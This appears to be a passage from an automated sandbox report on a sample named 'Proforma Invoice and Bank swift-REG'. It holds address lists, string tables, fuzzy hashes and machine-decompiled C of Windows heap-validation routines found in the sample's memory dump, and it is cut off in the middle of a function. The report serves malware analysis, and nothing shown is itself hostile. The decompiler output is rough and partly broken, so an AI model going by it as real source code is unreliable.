0x00ba4e03
0x00ba4e08
0x00ba4f88
0x00ba4f92
0x00ba4f99
0x00ba4f9c
0x00ba4fe0
0x00ba4fe4
0x00ba4fee
0x00ba4ff4
0x00ba4ff4
0x00ba4ff4
0x00000000
0x00ba4fe4
0x00ba4f9e
0x00ba4fa4
0x00ba4fa8
0x00ba4fc7
0x00ba4fcc
0x00ba4faa
0x00ba4fbf
0x00ba4fc4
0x00ba4fd2
0x00ba4fd5
0x00ba4fd6
0x00ba4f34
0x00ba4f34
0x00000000
0x00ba4f39
0x00ba4e0e
0x00ba4e14
0x00ba4e1b
0x00ba4e25
0x00ba4e2b
0x00ba4e2b
0x00ba4e33
0x00ba4e38
0x00ba4e8a
0x00ba4e8a
0x00000000
0x00ba4e3a
0x00ba4e3e
0x00ba4e43
0x00ba4e47
0x00ba4e53
0x00ba4e58
0x00ba4e5a
0x00ba4e5c
0x00ba4e61
0x00ba4e61
0x00ba4e5a
0x00ba4e6e
0x00ba4f41
0x00ba4f47
0x00ba4f4b
0x00ba4f6a
0x00ba4f6f
0x00ba4f4d
0x00ba4f62
0x00ba4f67
0x00ba4f7f
0x00ba4f80
0x00ba4f81
0x00000000
0x00ba4e74
0x00ba4e78
0x00ba4e82
0x00ba4e88
0x00ba4e88
0x00000000
0x00ba4e78
0x00ba4e6e
0x00ba4e38
0x00ba4df3
0x00ba4bfe
0x00ba4c01
0x00ba4c04
0x00ba4c07
0x00ba4c09
0x00ba4c0c
0x00ba4c0e
0x00ba4c0e
0x00ba4c11
0x00ba4c11
0x00ba4c0c
0x00ba4c14
0x00ba4c17
0x00ba4dae
0x00ba4db2
0x00ba4db7
0x00ba4dba
0x00ba4dbd
0x00ba4ef1
0x00ba4ef7
0x00ba4efb
0x00ba4f1a
0x00ba4f1f
0x00ba4efd
0x00ba4f12
0x00ba4f17
0x00ba4f2b
0x00ba4f2b
0x00ba4f2d
0x00ba4f2e
0x00ba4f2f
0x00000000
0x00ba4f2f
0x00000000
0x00ba4c1d
0x00ba4c1d
0x00ba4c20
0x00ba4c23
0x00ba4c26
0x00ba4c29
0x00ba4c2c
0x00ba4c2e
0x00ba4d91
0x00ba4d91
0x00ba4d92
0x00ba4d97
0x00ba4d9e
0x00000000
0x00ba4d9e
0x00ba4c34
0x00ba4c37
0x00ba4c39
0x00ba4c3c
0x00000000
0x00000000
0x00ba4c45
0x00ba4c48
0x00ba4c4e
0x00ba4c50
0x00ba4c78
0x00ba4c78
0x00ba4c7b
0x00ba4c7d
0x00ba4c80
0x00ba4c84
0x00ba4cad
0x00ba4cad
0x00ba4cb0
0x00ba4cb8
0x00ba4cbb
0x00ba4cbe
0x00ba4cc1
0x00ba4cc7
0x00ba4cdc
0x00ba4cc9
0x00ba4cd2
0x00ba4cd4
0x00ba4cd4
0x00ba4cde
0x00ba4ce0
0x00ba4d13
0x00ba4d13
0x00ba4d16
0x00ba4d18
0x00ba4d29
0x00ba4d2a
0x00ba4d2c
0x00ba4d34
0x00ba4d1a
0x00ba4d1a
0x00ba4d1a
0x00ba4d1d
0x00ba4d1f
0x00ba4d22
0x00ba4d24
0x00ba4d24
0x00ba4d3c
0x00ba4d3f
0x00ba4d45
0x00ba4d47
0x00ba4d6c
0x00ba4d6c
0x00ba4d70
0x00ba4d7e
0x00ba4d84
0x00ba4d84
0x00000000
0x00ba4d49
0x00ba4d49
0x00ba4d56
0x00ba4d56
0x00ba4d59
0x00000000
0x00000000
0x00ba4d4e
0x00ba4d50
0x00ba4d52
0x00ba4d8e
0x00ba4d5d
0x00ba4d5f
0x00ba4d67
0x00000000
0x00ba4d67
0x00ba4d54
0x00ba4d54
0x00ba4d5b
0x00000000
0x00ba4d5b
0x00ba4ce2
0x00ba4ce2
0x00ba4ce5
0x00ba4ce5
0x00ba4ce7
0x00ba4cfb
0x00ba4ce9
0x00ba4ce9
0x00ba4cec
0x00ba4cef
0x00ba4cf1
0x00ba4cf3
0x00ba4cf3
0x00ba4cf3
0x00ba4cf6
0x00ba4cf6
0x00ba4d02
0x00ba4d05
0x00000000
0x00000000
0x00ba4d07
0x00ba4d0f
0x00ba4d11
0x00000000
0x00000000
0x00000000
0x00ba4d11
0x00000000
0x00ba4ce5
0x00ba4ce0
0x00ba4c8a
0x00ba4c8f
0x00ba4c91
0x00000000
0x00000000
0x00ba4c9d
0x00000000
0x00ba4c9d
0x00ba4c52
0x00ba4c5f
0x00ba4c5f
0x00ba4c62
0x00000000
0x00000000
0x00ba4c57
0x00ba4c59
0x00ba4c5b
0x00ba4caa
0x00ba4c66
0x00ba4c68
0x00ba4c70
0x00ba4c75
0x00000000
0x00ba4c75
0x00ba4c5d
0x00ba4c5d
0x00ba4c64
0x00000000
0x00ba4c64
0x00ba4c17
0x00ba4b75
0x00ba4bc4
0x00ba4bc8
0x00000000
0x00000000
0x00ba4bd9
0x00000000
0x00000000
0x00000000
0x00ba4b77
0x00ba4b7a
0x00ba4b8c
0x00ba4b7c
0x00ba4b7e
0x00ba4b83
0x00ba4b86
0x00ba4b86
0x00ba4b90
0x00ba4b93
0x00000000
0x00000000
0x00ba4b95
0x00ba4bab
0x00ba4bb0
0x00000000
0x00000000
0x00ba4bb2
0x00ba4bb9
0x00000000
0x00000000
0x00ba4bbb
0x00ba4bbe
0x00ba4bc1
0x00ba4bc1
0x00000000
0x00ba4bc1
0x00ba4b97
0x00ba4ba4
0x00000000
0x00000000
0x00ba4ba6
0x00000000
0x00ba4ba6
0x00ba4ea9
0x00ba4ea9
0x00ba4eb2
0x00000000

Strings

Free Heap block %p modified at %p after it was freed, xrefs: 00BA4F2F
Heap block at %p has incorrect segment offset (%x), xrefs: 00BA503B
Heap block at %p is not last block in segment (%p), xrefs: 00BA4FD6
HEAP[%wZ]: , xrefs: 00BA4EE1, 00BA4F0D, 00BA4F5D, 00BA4FBA, 00BA501D, 00BA5061, 00BA50FA
HEAP: , xrefs: 00BA4F1A, 00BA4F6A, 00BA4FC7, 00BA502A, 00BA506E, 00BA50B6, 00BA5107
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 00BA5119
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 00BA4F81
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 00BA50C6
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 00BA508C

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 438467b3e247581691f7e6a965f2ca141ac98bf3701190bf4a6d9ccfd3fb216f
Instruction ID: af68456da2bf66209dca0139d81d1d156aa28ab94ab2323ecb749179222e5e56
Opcode Fuzzy Hash: 438467b3e247581691f7e6a965f2ca141ac98bf3701190bf4a6d9ccfd3fb216f
Instruction Fuzzy Hash: 9B12B230219641EFD725DF29C495BBAB7F1FF8A310F1484A9E48A8B681D7B4EC80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4496, Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00BA4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E00BA49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0xbd6378 = _t267;
						asm("int3");
						 *0xbd6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E00B1174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E00AEB150();
							} else {
								E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E00AEB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E00AEB150();
							} else {
								E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E00AEB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0xbd6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E00B29660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E00B1174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E00AEB150();
										} else {
											E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E00AEB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E00AEB150();
									} else {
										E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E00AEB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E00AEB150();
								} else {
									E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E00AEB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E00AEB150();
							} else {
								E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E00BA4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E00B9FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E00B923E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x00ba44a1
0x00ba44a3
0x00ba44a7
0x00ba44ac
0x00ba44af
0x00ba44b2
0x00ba44b9
0x00ba44bc
0x00ba47f2
0x00ba47f2
0x00ba47f8
0x00ba47fc
0x00ba47fe
0x00ba4804
0x00ba4805
0x00ba4805
0x00ba480c
0x00ba4810
0x00ba4812
0x00ba4812
0x00ba4812
0x00ba4822
0x00ba4822
0x00ba4827
0x00ba4827
0x00000000
0x00ba4827
0x00ba44c4
0x00ba44d3
0x00ba44d9
0x00ba44dc
0x00ba44de
0x00ba44e0
0x00ba4560
0x00ba4520
0x00ba4522
0x00ba4525
0x00ba4528
0x00ba452b
0x00ba452e
0x00ba4530
0x00ba4697
0x00ba469d
0x00ba46a1
0x00ba46c0
0x00ba46c5
0x00ba46a3
0x00ba46b8
0x00ba46bd
0x00ba46cb
0x00ba46d4
0x00ba4677
0x00ba4677
0x00ba4679
0x00ba467c
0x00ba468a
0x00ba4690
0x00ba4690
0x00ba47f1
0x00ba47f1
0x00ba47f1
0x00000000
0x00ba47f1
0x00ba4536
0x00ba4539
0x00ba453c
0x00ba4636
0x00ba463c
0x00ba4640
0x00ba465f
0x00ba4664
0x00ba4642
0x00ba4657
0x00ba465c
0x00ba4670
0x00000000
0x00ba4542
0x00ba4542
0x00ba4546
0x00ba4548
0x00ba454b
0x00ba4555
0x00ba455b
0x00ba455b
0x00ba455b
0x00ba455d
0x00ba455d
0x00ba455d
0x00000000
0x00ba455d
0x00ba453c
0x00ba4579
0x00ba457c
0x00ba4587
0x00ba4589
0x00ba4591
0x00ba4592
0x00ba4597
0x00ba4598
0x00ba45a1
0x00ba45ab
0x00ba45ab
0x00ba45a1
0x00ba45ae
0x00ba45b4
0x00ba45b9
0x00ba45bd
0x00ba4759
0x00ba4759
0x00ba475f
0x00ba4761
0x00ba4763
0x00ba4765
0x00ba4768
0x00ba476b
0x00ba476d
0x00ba479c
0x00ba479c
0x00ba479f
0x00ba47a2
0x00ba47a4
0x00ba4830
0x00ba4833
0x00ba4879
0x00ba487d
0x00ba48f1
0x00ba48f3
0x00ba48f3
0x00000000
0x00ba48f3
0x00ba487f
0x00ba4885
0x00ba4887
0x00ba48a8
0x00ba48a8
0x00ba48ae
0x00ba48b0
0x00ba48dc
0x00ba48dc
0x00ba48dc
0x00ba48dc
0x00ba48ec
0x00000000
0x00ba48ec
0x00ba48b2
0x00ba48bc
0x00ba48be
0x00ba48c1
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba48c3
0x00ba48c3
0x00ba48c6
0x00ba48c9
0x00ba48cc
0x00ba48d1
0x00ba48d4
0x00000000
0x00000000
0x00ba48d6
0x00ba48d7
0x00ba48da
0x00000000
0x00000000
0x00000000
0x00ba48da
0x00ba494f
0x00ba4955
0x00ba4959
0x00ba4978
0x00ba497d
0x00ba495b
0x00ba4970
0x00ba4975
0x00ba4986
0x00ba4987
0x00ba498a
0x00ba498d
0x00ba4997
0x00ba47ef
0x00ba47ef
0x00ba47ef
0x00000000
0x00ba47ef
0x00ba4890
0x00ba4890
0x00ba4891
0x00ba4891
0x00ba4894
0x00ba4897
0x00ba489d
0x00ba48a0
0x00000000
0x00000000
0x00ba48a2
0x00ba48a3
0x00ba48a6
0x00000000
0x00000000
0x00000000
0x00ba48a6
0x00ba48fb
0x00ba4901
0x00ba4905
0x00ba4924
0x00ba4929
0x00ba4907
0x00ba491c
0x00ba4921
0x00ba492f
0x00ba4935
0x00ba4936
0x00ba4939
0x00ba4942
0x00000000
0x00ba4947
0x00ba4835
0x00ba483b
0x00ba483f
0x00ba485e
0x00ba4863
0x00ba4841
0x00ba4856
0x00ba485b
0x00ba4869
0x00ba486c
0x00ba486f
0x00ba47e7
0x00ba47e7
0x00000000
0x00ba47ec
0x00ba47aa
0x00ba47b0
0x00ba47b4
0x00ba47d3
0x00ba47d8
0x00ba47b6
0x00ba47cb
0x00ba47d0
0x00ba47de
0x00ba47df
0x00ba47e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba476f
0x00ba476f
0x00ba4778
0x00ba4785
0x00ba4787
0x00ba478c
0x00ba478e
0x00000000
0x00000000
0x00ba4790
0x00ba4792
0x00ba4794
0x00000000
0x00000000
0x00ba4796
0x00ba4799
0x00000000
0x00ba4799
0x00000000
0x00ba45c3
0x00ba45c3
0x00ba45c7
0x00ba45c7
0x00ba45ca
0x00ba45cf
0x00ba45d3
0x00ba45df
0x00ba45e4
0x00ba45e6
0x00ba45e8
0x00ba45ed
0x00ba45ed
0x00ba45f2
0x00ba45f2
0x00ba45f7
0x00ba45fc
0x00ba4602
0x00ba4606
0x00ba4609
0x00ba460f
0x00ba46de
0x00ba46e3
0x00ba46e5
0x00ba46ec
0x00ba46ee
0x00ba46f6
0x00ba46f6
0x00ba46f6
0x00ba46f6
0x00ba46ec
0x00ba4615
0x00ba4615
0x00ba461d
0x00ba462e
0x00ba462e
0x00ba461d
0x00ba460f
0x00ba4609
0x00ba46fd
0x00000000
0x00000000
0x00ba4710
0x00ba471a
0x00ba4720
0x00ba4720
0x00ba4722
0x00ba472c
0x00000000
0x00ba472e
0x00ba472e
0x00000000
0x00ba472e
0x00ba472c
0x00ba4738
0x00ba473c
0x00ba474b
0x00ba4751
0x00ba4751
0x00000000
0x00ba473c
0x00ba48f4
0x00ba48f4
0x00000000
0x00ba48f4

Strings

HEAP[%wZ]: , xrefs: 00BA4652, 00BA46B3, 00BA47C6, 00BA4851, 00BA4917, 00BA496B
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 00BA493D
HEAP: , xrefs: 00BA465F, 00BA46C0, 00BA47D3, 00BA485E, 00BA4924, 00BA4978
Non-Dedicated free list element %p is out of order, xrefs: 00BA466B
dedicated (%04Ix) free list element %p is marked busy, xrefs: 00BA46CF
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 00BA486F
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 00BA4992
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 00BA47E2

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: bacc28fc8d8dac80412372c09d01329a274c835045c05d0f3deeece2e4e57139
Instruction ID: e8b28b7f902a5df2728be1c1681b06832bf9225efb9100756cc16444f0aec912
Opcode Fuzzy Hash: bacc28fc8d8dac80412372c09d01329a274c835045c05d0f3deeece2e4e57139
Instruction Fuzzy Hash: 6CF16531A04686EFCB20DF69C494BBBB7F1FF8A310F1485AAE04697281C7B4AD45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B0A309, Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00B0A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0xbd8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E00B0A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E00B0DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E00AE9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
